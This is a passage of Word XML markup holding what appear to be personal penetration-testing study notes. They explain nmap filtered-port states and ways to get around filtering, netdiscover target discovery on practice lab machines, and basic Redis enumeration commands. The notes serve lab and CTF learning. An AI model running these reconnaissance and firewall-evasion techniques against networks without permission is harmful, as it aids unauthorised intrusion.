        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that we can access raw sockets.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002940">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtered port meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002941">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A filtered state in nmap indicates that a port is being blocked by a firewall or some other network device (e.g., router, intrusion prevention system) that is actively filtering packets. This means nmap did not receive a response to its probe; instead, the packets were either dropped or filtered by an intermediary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002942">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002943">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtered ports may require bypass techniques, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002944">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adjusting scan types (e.g., SYN scan or UDP scan).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002946">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying to identify filtering rules with tools like hping3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002947">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use --reason with nmap to understand why a port state was determined (nmap -p 80 --reason).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002948">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002949">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding these states helps in identifying the security posture of the target network and tailoring further scanning or attacks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294E">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4F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002950">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002951">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jndhtusxeky9" w:id="356"/>
      <w:bookmarkEnd w:id="356"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding IP of target machine (using netdiscover)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002952">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002953">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some older boxes, like </w:t>
      </w:r>
      <w:hyperlink r:id="rId855">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play (although this walkthrough is back when cybersploit1 was in vulnhub so maybe it tells you to the IP now), they might not tell you the IP of the target machine, but rather give you an IP subnet range. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002954">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002955">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, to find the IP of the target machine, you have to use netdiscover:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002956">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="247" name="image242.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image242.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId856"/>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2957">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Idk how, but according to the walkthrough, they could tell that 192.168.1.14 was the target machine based on this output (second to last output)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is chatGPT guess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002959">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="390" name="image379.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image379.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId857"/>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295A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295C">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5D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hs7ktu12bpk1" w:id="357"/>
      <w:bookmarkEnd w:id="357"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002960">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis (Remote Dictionary Server) is an open-source, in-memory data structure store commonly used as a database, cache, and message broker. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002961">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002962">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen on port 6379 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002963">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002964">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's similar to SQL in that it is a database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002965">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002966">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hierarchical structure is as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002967">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002968">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT [number]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the number corresponds to the number of the database, to go into a specific database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002969">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The default and main database is usually "0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYS *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to get all the keys in a Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DBSIZE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while inside of a Database, to see how many keys there are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys are inside of the Database, and these are like "Keys and Values", where the keys are like a string representations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET [key name]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to get the value of a specific key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002970">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "value" section of the Key and Value model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002971">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
